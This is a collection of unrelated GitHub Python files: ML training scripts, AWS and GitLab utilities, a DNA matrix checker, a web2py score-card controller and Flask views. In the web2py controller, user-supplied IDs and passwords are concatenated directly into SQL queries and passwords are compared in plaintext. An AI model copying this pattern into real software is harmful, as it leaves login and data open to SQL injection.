draw\")","repo_name":"u-keisuke/ga_reversi","sub_path":"reversi.py","file_name":"reversi.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"29706149642","text":"import boto3\nimport json\n\nendpoint_url = \"http://localhost:4576\"\nregion_name = \"ap-southeast-1\"\n\n# Choosing the resource from boto3 module\nsqs = boto3.resource('sqs', endpoint_url=endpoint_url, region_name=region_name)\ndynamodb = boto3.resource('dynamodb', endpoint_url=endpoint_url, region_name=region_name)\nclient = boto3.client('sqs', endpoint_url=endpoint_url, region_name=region_name)\n\n# Choose DynamoDB table\ntable = dynamodb.Table('message')\n\n# Get the queue named test-queue\nqueue = sqs.get_queue_by_name(QueueName='test-queue')\n\n# Consume all messages from queue\ndef consumer(c):\n    i=0\n    while i
1\r\n\r\n click.echo(f'Exported {len(finished_ids)} projects!')\r\n","repo_name":"marvinweber/gitlab-bulk-project-export","sub_path":"gitlab_bulk_project_export/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27671398670","text":"from data_preprocess.criteo import create_criteo_dataset\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.losses import mean_squared_error\nfrom tensorflow.keras.metrics import AUC\nfrom model import AFM\n\nfile = \"D:/data/kaggle_ad_ctr/train.txt\"\nembed_dim = 8\nattention_dense_dim = 8\nhidden_units = [256, 128, 64]\nlr = 0.0001\nbatch_size = 256\nepochs = 10\n# mode : 'afm' or 'fm'\nmode = 'fm'\n\nfeature_column, (train_X, train_y), (test_X, test_y) = create_criteo_dataset(file=file, embed_dim=embed_dim,\n read_part=True)\nmodel = AFM(feature_column, attention_dense_dim, mode)\nmodel.compile(optimizer=Adam(lr), loss=mean_squared_error, metrics=AUC())\nmodel.fit(x=train_X, y=train_y, batch_size=batch_size, epochs=epochs, validation_data=(test_X, test_y), shuffle=True)\nprint(\"model evaluate:\", model.evaluate(x=test_X, y=test_y))\n","repo_name":"LXXiaogege/recommendation","sub_path":"models/AFM/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4146471728","text":"import sys\nfrom random import random\nfrom math import floor\nfrom os import listdir, makedirs, path\nfrom os.path import isfile, join, exists\nfrom moviepy.editor import VideoFileClip\nfrom image_hash import image_hash\nfrom PIL import Image\nimport numpy as np\nimport config\nimport multiprocessing\nimport cached_results\nfrom Levenshtein import distance\nimport compare_strings\nfrom sklearn.cluster import KMeans\n\ndef eprint(s):\n print(s, file=sys.stderr)\n\n\ndef create_average_frame(video_clip):\n n_frames = 0\n dimensions = list(reversed(video_clip.size)) + [3]\n pixel_matrix = np.zeros(tuple(dimensions), dtype=np.uint8)\n for frame in video_clip.iter_frames():\n pixel_matrix = pixel_matrix + frame\n n_frames = n_frames + 1\n\n average_frame_matrix = pixel_matrix / n_frames\n return Image.fromarray(average_frame_matrix, 'RGB')\n\ndef load_frame_from_cache(file_name):\n image_name = path.basename(file_name).split('.')[0] + \".jpg\"\n image_path = path.join(config.image_path, image_name)\n #print(\"Loading image {}\".format(image_path))\n return Image.open(image_path)\n\ndef average_frame_is_cached(file_name):\n image_name = path.basename(file_name).split('.')[0] + \".jpg\"\n image_path = path.join(config.image_path, image_name)\n if exists(image_path):\n return True\n return False\n\ndef cache_image(image, file_name):\n image_name = path.basename(file_name).split('.')[0] + \".jpg\"\n image_path = path.join(config.image_path, image_name)\n image.save(image_path)\n \ndef create_video_hash(file_name):\n average_frame = None\n if average_frame_is_cached(file_name):\n average_frame = load_frame_from_cache(file_name)\n else:\n video_clip = VideoFileClip(file_name)\n average_frame = create_average_frame(video_clip)\n cache_image(average_frame, file_name)\n\n if file_name in cached_results.hashes:\n return cached_results.hashes[file_name]\n else:\n average_frame_hash = image_hash(average_frame)\n cached_results.add_hash(file_name, average_frame_hash)\n return average_frame_hash\n\ndef init_image_cache():\n if not 
exists(config.image_path):\n        makedirs(config.image_path)\n\ndef find_closest_hash(h, hashes):\n    closest = list(hashes)[0]\n    smallest_d = 100\n    for h2, name in hashes:\n        d = compare_strings.compare(h, h2)\n        if d < smallest_d:\n            closest = (h2, name)\n            smallest_d = d\n\n    return closest\n\ndef main(argv):\n    init_image_cache()\n    data_path = argv[1]\n    hash_video_list = []\n    total_number_of_items = len(listdir(data_path))\n    counter = 0\n\n    for file_name in listdir(data_path):\n        if(counter % 100 == 0):\n            eprint(\"Hashing {}/{}\".format(counter, total_number_of_items))\n        if(counter % 1000 == 0):\n            cached_results.save()\n        counter += 1\n\n        if isfile(join(data_path, file_name)):\n            video_hash = create_video_hash(join(data_path, file_name))\n            hash_video_list.append((video_hash, path.basename(file_name),))\n\n    eprint(\"Done hashing\")\n\n    hash_video_array = np.array([i[0] for i in hash_video_list])\n    kmeans = KMeans(n_clusters=10).fit(hash_video_array)\n    videos = [i[1] for i in hash_video_list]\n\n    for i in range(len(kmeans.labels_)):\n        print(kmeans.labels_[i], videos[i])\n\n    eprint(\"Done clustering\")\n\nif __name__ == \"__main__\":\n    main(sys.argv)\n","repo_name":"arnargisla/tfbd-ch3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"74132728427","text":"# We use this function to set the dimension and fill the matrix \ndef llenarMatriz():\n    dimension=int(input(\"Ingrese la dimesion de la matriz: \"))\n    matriz = [[0] * dimension for _ in range(dimension)]\n\n    for fila in range(dimension):\n        for columna in range(dimension):\n            while True: \n                letra = input(f\"Ingrese la letra de la cadena numero: [{columna}]:\").upper()\n                if (letra==\"A\" or letra==\"T\" or letra==\"C\" or letra==\"G\" ):\n                    matriz[fila][columna] = letra\n                    break\n                else:\n                    print(\"El valor ingresado no es correcto intente nuevamente\")\n    return matriz\n\ndef AnalizarCondcion(matriz1):\n    coincidencia = 0\n    # Start traversing the matrix and evaluating it\n    for i in range(len(matriz1)):\n        for j in range(len(matriz1[0]) - 3):\n            # Horizontal\n            if len(set(matriz1[i][j : j + 4])) == 1:\n                coincidencia += 1\n\n            # Vertical\n            if len(set(matriz1[i][j] for i in range(i, i + 4))) == 1:\n                coincidencia += 1\n\n    for i in range(len(matriz1) - 3):\n        for j in range(len(matriz1[0]) - 3):\n            \n            if len(set(matriz1[i + k][j + k] for k in range(4))) == 1:\n                coincidencia += 1\n\n            \n            if len(set(matriz1[i + k][j + 3 - k] for k in range(4))) == 1:\n                coincidencia += 1\n    # Return the person's condition: \n    if coincidencia >= 2:\n        return print(\"La persona es: Mutante\")\n    else:\n        return print(\"La persona no es: Mutante\")\n\n# Call the functions\nMatriz= llenarMatriz()\nCondicon=AnalizarCondcion(Matriz)\n","repo_name":"LukaPerich/MutantsChallenge","sub_path":"Main/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"9397370558","text":"#! 
\n# Sumit Das\n\nfrom textblob import Word\nimport sys\n\ntry:\n\tLENGTH=sys.argv[1]\nexcept:\n\tLENGTH=0\n\nwith open('WORDS.TXT') as f:\n lines = f.read().splitlines()\n\ni = 0\nfor i in range(0,len(lines)):\n\tif lines[i]:\n\t\tif len(lines[i]) == int(LENGTH) :\n\t\t\tword = Word(str(lines[i]))\n\t\t\tresult = word.spellcheck()\n\t\t\tif result[0][1] == 1.0 :\n\t\t\t\tif int(LENGTH) == 0:\n\t\t\t\t\tprint(result[0][0])\n\t\t\t\telse:\n\t\t\t\t\tif len(result[0][0]) == int(LENGTH) :\n\t\t\t\t\t\tprint(result[0][0])\n\t\t\t\t\nf.close()","repo_name":"RustyNails8/Letters2Words","sub_path":"2-MakeWords4mLists.py","file_name":"2-MakeWords4mLists.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9134606135","text":"import numpy as np\nimport pickle\nimport os\nfrom sklearn.cross_validation import train_test_split\nfrom chainer import cuda, Variable, optimizers, serializers\nimport chainer.functions as F\nfrom PIL import Image\nimport glob\nimport time\n\nfrom model import FaceSwapNet\nfrom model import VGG19\n\ndef conv_setup(ORIGINAL_VGG,VGG):\n VGG.conv1_1 = ORIGINAL_VGG.conv1_1\n VGG.conv1_2 = ORIGINAL_VGG.conv1_2\n VGG.conv2_1 = ORIGINAL_VGG.conv2_1\n VGG.conv2_2 = ORIGINAL_VGG.conv2_2\n VGG.conv3_1 = ORIGINAL_VGG.conv3_1\n VGG.conv3_2 = ORIGINAL_VGG.conv3_2\n VGG.conv3_3 = ORIGINAL_VGG.conv3_3\n VGG.conv4_1 = ORIGINAL_VGG.conv4_1\n VGG.conv4_2 = ORIGINAL_VGG.conv4_2\n \"\"\"\n VGG.conv4_3 = ORIGINAL_VGG.conv4_3\n VGG.conv5_1 = ORIGINAL_VGG.conv5_1\n VGG.conv5_2 = ORIGINAL_VGG.conv5_2\n VGG.conv5_3 = ORIGINAL_VGG.conv5_3\n VGG.fc6=ORIGINAL_VGG.fc6\n VGG.fc7=ORIGINAL_VGG.fc7\n \"\"\"\n return VGG\n \ndef load_data(content_path, style_path, target_width):\n X=[]\n for size in [8,16,32,64,128]:\n \n X_tmp=[]\n \"\"\"\n for path in glob.glob(content_path+\"*.jpg\"):\n image = Image.open(path).convert('RGB')\n X_tmp.append(np.array(image.resize((size, size), Image.ANTIALIAS))[:,:,::-1].transpose(2,0,1))\n np.save(\"X_\"+str(size)+\".npy\",np.array(X_tmp))\n \"\"\"\n \n X_tmp=np.load(\"X_\"+str(size)+\".npy\")\n X.append(np.array(X_tmp))\n print(\"size:{} {}loaded\".format(size,len(X_tmp)))\n \n style=[]\n for path in glob.glob(style_path+\"*\"):\n image = Image.open(path).convert('RGB')\n width, height = image.size\n target_height = int(round(float(height * target_width) / width))\n style.append(np.array(image.resize((target_width, target_height), Image.ANTIALIAS))[:,:,::-1].transpose(2,0,1))\n \n style=np.array(style)\n \n return X,style\n\n\n\ndef total_variation(x):\n xp = cuda.get_array_module(x.data)\n b, ch, h, w = x.data.shape\n wh = Variable(xp.asarray([[[[1], [-1]], [[0], [0]], [[0], [0]]], [[[0], [0]], [[1], [-1]], [[0], [0]]], [[[0], [0]], [[0], [0]], [[1], [-1]]]], dtype=xp.float32), volatile=x.volatile)\n ww = Variable(xp.asarray([[[[1, -1]], [[0, 0]], [[0, 0]]], [[[0, 0]], [[1, -1]], [[0, 0]]], [[[0, 0]], [[0, 0]], [[1, -1]]]], dtype=xp.float32), volatile=x.volatile)\n return F.sum(F.convolution_2d(x, W=wh) ** 2) + F.sum(F.convolution_2d(x, W=ww) ** 2)\n\n\n\n\nvgg=VGG19()\noriginal_vgg19=VGG19()\nserializers.load_hdf5(\"vgg19.model\",original_vgg19)\n\nvgg=conv_setup(original_vgg19,vgg)\ndel original_vgg19\n\ncnn=FaceSwapNet()\n\nX,style=load_data(content_path=\"data/content/fin_celebA/\",style_path=\"data/style/\",target_width=128)\nprint(\"succesfully data loaded!\")\n\nX_train=[]\nX_test=[]\nfor i in range(len(X)):\n X_train.append(X[i][:-10])\n 
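# load the per-resolution content arrays cached by the commented-out preprocessing pass above\n        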
X_test.append(X[i][-10:])\ndel X\n\noptimizer=optimizers.Adam(alpha=0.01)\noptimizer.setup(cnn)\n\ncnn.to_gpu()\nvgg.to_gpu()\nprint(\"model to gpu\")\n\nxp=cnn.xp\n\nN=len(X_train[0])\nbatch_size=16\nkernel=3\nalpha=1.0\nbeta=0\ngamma=1e-5\nn_epoch=10000\nsave_model_interval=1\nsave_image_interval=400\n\nstyle_patch=[]\nstyle_patch_norm=[]\n\"\"\"\nstyle=Variable(xp.array(style,dtype=xp.float32),volatile=True)\nstyle-=xp.array([[[[104]],[[117]],[[124]]]])\nstyle_feature=vgg(style)\nfor name in [\"3_1\",\"4_1\"]:\n patch_norm=xp.array([style_feature[name][0,:,j:j+kernel,i:i+kernel].data/xp.linalg.norm(style_feature[name][0,:,j:j+kernel,i:i+kernel].data) for j in range(style_feature[name].shape[2]-kernel+1) for i in range(style_feature[name].shape[3]-kernel+1)],dtype=xp.float32)\n \n patch=xp.array([style_feature[name][0,:,j:j+kernel,i:i+kernel].data for j in range(style_feature[name].shape[2]-kernel+1) for i in range(style_feature[name].shape[3]-kernel+1)],dtype=xp.float32)\n \n np.save(\"style_patch_norm\"+name+\".npy\",cuda.to_cpu(patch_norm))\n np.save(\"style_patch\"+name+\".npy\",cuda.to_cpu(patch))\n\n style_patch.append(patch)\n style_patch_norm.append(patch_norm)\ndel patch,patch_norm\n\"\"\"\n\nstyle_patch_norm=[xp.array(np.load(\"style_patch_norm\"+name+\".npy\"),xp.float32) for name in [\"3_1\",\"4_1\"]]\nstyle_patch=[xp.array(np.load(\"style_patch\"+name+\".npy\"),xp.float32) for name in [\"3_1\",\"4_1\"]]\n\n\nfor epoch in range(1,n_epoch+1):\n print(\"epoch\",epoch)\n perm=np.random.permutation(N)\n for i in range(0,N,batch_size):\n if beta<0.4:\n beta+=0.0001\n print(i,N,batch_size)\n cnn.zerograds()\n vgg.zerograds()\n\n x1=xp.array(X_train[0][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x2=xp.array(X_train[1][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x3=xp.array(X_train[2][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x4=xp.array(X_train[3][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n x5=xp.array(X_train[4][perm[i:i+batch_size]],dtype=xp.float32)/127.5-1.\n \n \n swap_X=cnn(x1,x2,x3,x4,x5)\n contents=Variable(xp.array(X_train[-1][perm[i:i+batch_size]],dtype=xp.float32),volatile=True)\n swap_X-=xp.array([[[[104]],[[117]],[[124]]]])\n contents-=xp.array([[[[104]],[[117]],[[124]]]])\n \n swap_feature=vgg(swap_X)\n content_feature=vgg(contents)\n ## content loss\n L_content=F.mean_squared_error(Variable(content_feature[\"4_2\"].data), swap_feature[\"4_2\"])\n ## style loss\n L_style=0\n for s,name in enumerate([\"3_1\",\"4_1\"]):\n L_style+=cnn.local_patch(swap_feature[name],Variable(style_patch[s],volatile=True),Variable(style_patch_norm[s],volatile=True))\n L_style/=2\n ## total variation loss\n L_tv=total_variation(swap_X)\n\n L=alpha*L_content+beta*L_style+gamma*L_tv\n L.backward()\n optimizer.update()\n\n\n if i%save_image_interval==0:\n for k,X in enumerate(swap_X.data):\n X = xp.transpose(X+xp.array([[[104]],[[117]],[[124]]]), (1,2,0))\n Image.fromarray(cuda.to_cpu(X)[:,:,::-1].astype(np.uint8)).save(\"out/portrait\"+str(epoch)+\"_\"+str(k)+\"_\"+str(beta)+\".jpg\")\n print(\"content loss={} style loss={} tv loss={}\".format(L_content.data/batch_size,L_style.data/batch_size,L_tv.data/batch_size))\n #with open(\"log.txt\",\"w\") as f:\n # f.write(\"content loss={} style loss={} tv loss={}\".format(sum_lc/N,sum_ls/N,sum_lt/N)+str(\"\\n\"))\n\n if epoch%save_model_interval==0:\n serializers.save_hdf5('PortraitModel_{}.model'.format(str(L.data/N).replace('.','')), cnn)\n 
\n","repo_name":"mikittt/portrait","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32280834721","text":"\n# Vamos utilizar o pacote requests para fazer requisições HTTP:\n# https://docs.python-requests.org/en/master/\n#\n# Para isso, ele precisa ser instalado via pip (de preferência com o VS Code fechado):\n# python -m pip install requests\nimport requests\n\nheaders={\n\n}\nresultado = requests.get(\"https://finance.yahoo.com/quote/TASA4.SA/history?p=TASA4.SA\")\n# Imprime algumas informações simples da resposta\n#print(resultado.status_code)\n#print(resultado.headers['content-type'])\n# Imprime a string pura da resposta\ntext = resultado.text\nprint(text)\n\n\n","repo_name":"hsandmann/espm.pi4.2022.1","sub_path":"exemplo/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29367836410","text":"\n#mpo\n#http://127.0.0.1:8000/hamdard/score_card_mobile/index?cid=Hamdard&rep_id=it03&rep_pass=1234\n\n\ndef index():\n c_id = request.vars.cid\n rep_id = request.vars.rep_id\n rep_pass = request.vars.rep_pass\n\n # ---------------------- rep check\n userRecords='select cid,rep_id,name,user_type from sm_rep where cid=\"'+c_id+'\" and rep_id=\"'+rep_id+'\" and password=\"'+rep_pass+'\" and status=\"ACTIVE\" limit 0,1;'\n userRecords=db.executesql(userRecords,as_dict=True)\n \n if len(userRecords)==0:\n response.flash = 'Invalid/Inactive Supervisor'\n else:\n for i in range(len(userRecords)):\n userRecordsS=userRecords[i]\n \n cid=userRecordsS['cid'] \n rep_id = str(userRecordsS['rep_id'])\n name = str(userRecordsS['name'])\n user_type = str(userRecordsS['user_type'])\n\n level3_id_str=''\n level_depth_no=''\n level_id=''\n if user_type == 'rep':\n userRecords = 'select area_id from sm_rep_area where cid=\"' + c_id + '\" and rep_id=\"' + rep_id + '\";'\n userRecords = db.executesql(userRecords, as_dict=True)\n\n if len(userRecords) == 0:\n response.flash = 'Invalid Territory'\n else:\n level3_id_list=[]\n for i in range(len(userRecords)):\n userRecordsS = userRecords[i]\n\n area_id = str(userRecordsS['area_id'])\n level3_id_list.append(area_id)\n\n if len(level3_id_list) > 0:\n level3_id_str = str(level3_id_list).replace('[', '').replace(']', '')\n\n\n else:\n userRecords = 'select level_depth_no,level_id from sm_supervisor_level where cid=\"' + c_id + '\" and sup_id=\"' + rep_id + '\" limit 0,1;'\n userRecords = db.executesql(userRecords, as_dict=True)\n\n if len(userRecords) == 0:\n response.flash = 'Invalid Level'\n else:\n for i in range(len(userRecords)):\n userRecordsS = userRecords[i]\n\n level_depth_no = userRecordsS['level_depth_no']\n level_id = str(userRecordsS['level_id'])\n\n\n\n\n session.cid = c_id\n session.user_id = rep_id\n session.user_type = user_type\n session.level3_id_str = level3_id_str\n session.level_depth_no = level_depth_no\n session.level_id = level_id\n\n redirect(URL('home', vars=dict()))\n\n return dict()\n\ndef home():\n c_id = session.cid\n rep_id=str(session.user_id)\n\n btn_report = request.vars.btn_report\n\n if btn_report:\n from_date = request.vars.from_date\n to_date = request.vars.to_date\n session.from_date = from_date\n session.to_date = to_date\n\n # dateFlag = True\n # try:\n # from_dt2 = datetime.datetime.strptime(str(from_date), '%Y-%m-%d')\n # to_dt2 = 
datetime.datetime.strptime(str(to_date), '%Y-%m-%d')\n # if from_date > to_dt2:\n # dateFlag = False\n # except:\n # dateFlag = False\n #\n # if dateFlag == False:\n # response.flash = \"Invalid Date Range\"\n # else:\n # dateDiff = (to_dt2 - from_dt2).days\n # if dateDiff > 1:\n # response.flash = \"Single days allowed between Date Range\"\n # else:\n # session.from_date = from_date\n # session.to_date = to_date\n\n\n\n records = ''\n condition=' cid=\"' + c_id + '\"'\n\n if session.from_date!=None and session.to_date!=None:\n condition += ' and submit_date>=\"' + session.from_date + '\" and submit_date<=\"' + session.to_date + '\" '\n\n if session.user_type == 'rep':\n if session.level3_id_str!='':\n condition += ' and level3_id in (' + session.level3_id_str + ') '\n else:\n if session.level_depth_no == 0:\n condition += ' and level0_id=\"' + session.level_id + '\" '\n elif session.level_depth_no == 1:\n condition += ' and level1_id=\"' + session.level_id + '\" '\n elif session.level_depth_no == 2:\n condition += ' and level2_id=\"' + session.level_id + '\" '\n\n\n\n\n records = 'select level0_id,level1_id,level2_id,level3_id,rep_id,rep_name,sum(ach) as ach,sum(pd_knowledge) as pd_knowledge,sum(rx_pres_share) as rx_pres_share,sum(pcpm) as pcpm,sum(four_p) as four_p,sum(reject_count) as reject_count,sum(facetime) as facetime,sum(walk_step_act_score) as walk_step_act_score,sum(overall_rate) as overall_rate from sm_score_card_details where ' + condition + ' group by level0_id,level1_id,level2_id,level3_id,rep_id;'\n records = db.executesql(records, as_dict=True)\n\n level_area_list=[]\n\n return dict(level_area_list=level_area_list,records=records)\n\n\ndef rep_details():\n c_id = session.cid\n rep_id=str(request.vars.rep_id)\n\n\n records = ''\n condition=' cid=\"' + c_id + '\"'\n condition += ' and rep_id=\"' + rep_id + '\" '\n\n if session.from_date!=None and session.to_date!=None:\n condition += ' and submit_date>=\"' + session.from_date + '\" and submit_date<=\"' + session.to_date + '\" '\n\n\n records = 'select level0_id,level1_id,level2_id,level3_id,rep_id,rep_name,sum(ach) as ach,sum(pd_knowledge) as pd_knowledge,sum(rx_pres_share) as rx_pres_share,sum(pcpm) as pcpm,sum(four_p) as four_p,sum(reject_count) as reject_count,sum(facetime) as facetime,sum(walk_step_act_score) as walk_step_act_score,sum(overall_rate) as overall_rate from sm_score_card_details where ' + condition + ' group by level0_id,level1_id,level2_id,level3_id,rep_id;'\n records = db.executesql(records, as_dict=True)\n\n\n\n return dict(records=records)\n\n","repo_name":"nadiranuri/acme_w05","sub_path":"controllers/score_card_mobile.py","file_name":"score_card_mobile.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23626913731","text":"#Main Views and URL endpoints to frontend of website\nfrom flask import Flask\nfrom flask import Blueprint, render_template, request, flash, jsonify, redirect, url_for\nfrom flask_mail import Mail, Message\nfrom email.message import EmailMessage\nfrom flask_login import login_required, current_user\nfrom .models import Feynman, Goal, Journal, Task, FinishedTask, ArchivedTask, Card, Lesson, Pride, Support\nfrom sqlalchemy.orm import aliased\nfrom . 
import db\nimport json, os, smtplib\nfrom datetime import date, datetime, timedelta\nimport csv\nimport plotly.graph_objs as go\nfrom sqlalchemy import and_, func, text\n\nviews = Blueprint('views', __name__)\n\n\napp = Flask(__name__)\n\n\n# Get the values of the environment variables\nmail_username = os.environ.get('MAIL_USERNAME')\nmail_password = os.environ.get('MAIL_PASSWORD')\n\n\n# Creating the Mail instance\nmail = Mail(app)\n\n\n# Defining the support email address\nsupport_email = \"proempohelpdesk@gmail.com\" \n\n\n@views.route('/')\n@login_required\ndef home():\n qod = generate_quote()\n currentDay = todays_date()\n print(current_user.language)\n if current_user.language == \"ro\":\n welcome = \"Bun venit la ProEmPo, \"\n currentDay = \"Astăzi este \" + today.strftime(\"%d.%m.%Y\")\n openNoisePlayer = \"Deschide playerul de zgomot alb\"\n journalIncomplete = \"Se pare că nu ați finalizat înregistrarea zilnică pentru astăzi.\"\n clickJournal = \"Faceți clic aici pentru a vă completa jurnalul.\"\n currenttasks = \"Sarcini curente:\"\n notasks = \"Nu aveți sarcini în prezent. Accesați sarcini pentru a face mai multe.\"\n journalComplete = \"Bună treabă, ați completat azi check-in-ul zilnic!\"\n dueReminder = \"Datorită:\"\n else:\n welcome = \"Welcome to ProEmPo, \"\n openNoisePlayer = \"Open Noise Player\"\n journalIncomplete = \"It looks like you haven't completed your daily check-in for today.\"\n clickJournal = \"Click here to fill out your journal.\"\n currenttasks = \"Current Tasks:\"\n notasks = \"You have no tasks currently. Go to tasks to make more.\"\n journalComplete = \"Good Job, you filled out your daily check-in today!\"\n dueReminder = \"Due:\"\n entry_for_today = Journal.query.filter(Journal.date == today, Journal.user_id == current_user.id).first()\n tasks = Task.query.filter(Task.user_id == current_user.id).order_by(text(current_user.defaultsort))\n\n return render_template(\"home.html\", tasks=tasks, notasks=notasks, currenttasks=currenttasks, user=current_user, qod=qod, currentDay=currentDay, welcome=welcome,\n openNoisePlayer=openNoisePlayer, entry_for_today=entry_for_today, journalIncomplete=journalIncomplete, \n dueReminder=dueReminder, clickJournal=clickJournal, journalComplete=journalComplete)\n\ntoday = date.today()\n\ndef todays_date():\n day_str = today.strftime('%d')\n day_int = int(day_str)\n \n if day_int < 10:\n day = (today.strftime('%d')).lstrip('0')\n else:\n day = (today.strftime('%d'))\n \n # 11, 12 and 13 take 'th' even though they end in 1, 2 and 3\n if day_int in (11, 12, 13):\n day = day + 'th'\n elif (day_int % 10 == 1):\n day = day + 'st'\n elif (day_int % 10 == 2):\n day = day + 'nd'\n elif (day_int % 10 == 3):\n day = day + 'rd'\n else:\n day = day + 'th'\n\n currentDay = today.strftime('%A, %B ' + day + ', %Y')\n\n return currentDay\ndef generate_quote():\n csv_file_path = os.path.join(app.root_path, 'static', 'list.csv')\n with open(csv_file_path, 'r') as f:\n\n reader = csv.reader(f, delimiter=',')\n epoch = datetime(2023, 10, 1)\n today = datetime.now()\n currentDay = (today - epoch).days\n num_lines = sum(1 for _ in reader)\n index = currentDay % num_lines\n f.seek(0)\n \n for i, row in enumerate(reader):\n if i == index:\n if(row[0] == \"\") :\n row[0] = \"Unknown Author\"\n qod = (row[1], row[0]) \n break\n else:\n qod = \"Error: Quote not found.\"\n\n return qod\n\n@app.route('/toggle_white_noise', methods=['POST'])\n@login_required\ndef toggle_white_noise():\n print(\"Form submitted\")\n # Handle the white noise play/pause action based on the form submission (your 
implementation)\n return redirect(url_for('views.home')) # Redirect back to the home page after handling the action\n\n\n\n\n\n\n@views.route('/help')\n@login_required\ndef help():\n print(current_user.language)\n if current_user.language == \"ro\":\n cSelfWork = \"Concentrare\"\n pomodoroDescription = \"Încercați tehnica Pomodoro pentru a vă crește productivitatea.\"\n flashcards = \"Carduri Flash\"\n flashcardsDescription = \"Folosiți carduri pentru a memora informații în mod eficient.\"\n create = \"Crează\"\n view = \"Arată\"\n feynmanDescription = \"Stăpânește subiecte complexe explicând-o unei entități mai mici în termeni simpli.\"\n iSelfWork = \"Munca De Sine\"\n accomplishments = \"Realizări\"\n prideDescription = \"Lucrează la sufletul tau interior enumerând lucruri care te fac să te simți mândru de tine.\"\n begin = \"Începe\"\n goals = \"Obiective\"\n goalsDescription = \"Enumerați-vă obiectivele pe termen lung pentru a vă ajuta să rămâneți concentrat pe ceea ce este important pentru dumneavoastră.\"\n meditation = \"Meditaţie\"\n meditationDescription = \"Găsiți pace și reduceți stresul prin respirație ghidată.\"\n youngEdition = \"Ediția Tânără\"\n collegeEdition = \"Ediția Pentru Colegiu\"\n else:\n cSelfWork = \"Concentration Self-Work\"\n pomodoroDescription = \"Try the Pomodoro Technique to boost your productivity.\"\n flashcards = \"Flashcards\"\n flashcardsDescription = \"Use flashcards to memorize information effectively.\"\n create = \"Create\"\n view = \"View\"\n feynmanDescription = \"Master complex subjects by explaining it to a smaller entity in simple terms.\"\n iSelfWork = \"Inner Self-Work\"\n accomplishments = \"Accomplishments\"\n prideDescription = \"Work on your inner self by listing things that make you feel proud of yourself.\"\n begin = \"Begin\"\n goals = \"Goals\"\n goalsDescription = \"List your long term goals to help you remain focused on what is important to you.\"\n meditation = \"Meditation\"\n meditationDescription = \"Find peace and reduce stress through paced breathing.\"\n youngEdition = \"Young Edition\"\n collegeEdition = \"College Edition\"\n return render_template(\"help.html\", user=current_user, cSelfWork=cSelfWork, pomodoroDescription=pomodoroDescription, \n flashcards=flashcards, flashcardsDescription=flashcardsDescription, create=create, view=view, \n feynmanDescription=feynmanDescription, iSelfWork=iSelfWork, accomplishments=accomplishments, \n prideDescription=prideDescription, begin=begin, goals=goals, goalsDescription=goalsDescription, \n meditation=meditation, meditationDescription=meditationDescription, youngEdition=youngEdition, collegeEdition=collegeEdition)\n\n@views.route('/feynman')\n@login_required\ndef feynman():\n latest_entry = Feynman.query.filter_by(user_id=current_user.id).order_by(Feynman.id.desc()).first()\n\n # Replacing newline characters with
<br> tags for proper display in HTML\n if latest_entry:\n latest_entry.description = latest_entry.description.replace('\n', '<br>')\n\n\n if current_user.language == \"ro\":\n title=\"Metoda Feynman\"\n question=\"Cum încep?\"\n writeTitle = \"Scrie titlul aici\"\n writeDescription=\"Scrie descrierea aici\"\n startNew = \"Începe Nou\"\n RememberThoughts=\"Salvează-mi gândurile pentru data viitoare\"\n explanation1=\"Metoda Feynman are 4 pași simpli:\"\n explanation2=\"După ce ați studiat subiectul, începeți să îl scrieți într-un limbaj simplu. Gândiți-vă la asta ca la explicarea subiectului ales unui copil mic. Dacă există lacune în înțelegerea dvs., completați-le și încercați din nou. Ideea principală este că, dacă nu reușiți să-l explicați simplu, nu îl înțelegeți suficient de bine și aveți nevoie de mai multă practică.\"\n explanation3=\"Acum, închideți fereastra asta și începeți.\"\n else:\n title=\"Feynman Method\"\n question=\"How do I begin?\"\n writeTitle=\"Write topic here\"\n writeDescription=\"Write description here\"\n startNew = \"Start New\"\n RememberThoughts = \"Remember my thoughts for next time\"\n explanation1=\"The Feynman Method has 4 easy steps:\"\n explanation2=\"After studying your topic, begin writing it down in simple language. Think of it as explaining your chosen topic to a toddler. If there are gaps in your understanding, fill them in and try again. The core point is that if you are unable to explain it simply, you don't understand it well enough and need more practice.\"\n explanation3=\"Now, close this popup and begin.\"\n\n return render_template(\"feynman.html\", user=current_user, latest_entry=latest_entry, \n title=title, question=question, writeTitle=writeTitle, writeDescription=writeDescription, startNew=startNew,\n RememberThoughts=RememberThoughts, explanation1=explanation1, explanation2=explanation2, explanation3=explanation3)\n\n@views.route('/start-new-entry', methods=['POST'])\n@login_required\ndef start_new_entry():\n new_feynman_entry = Feynman(user_id=current_user.id, title='', description='')\n db.session.add(new_feynman_entry)\n db.session.commit()\n\n return redirect(url_for('views.feynman'))\n\n\n@views.route('/save-data', methods=['POST'])\n@login_required\ndef save_data():\n data = request.get_json()\n title = data.get('title')\n description = data.get('description')\n\n # Save the data to the database for the current user\n new_feynman_entry = Feynman(\n user_id=current_user.id,\n 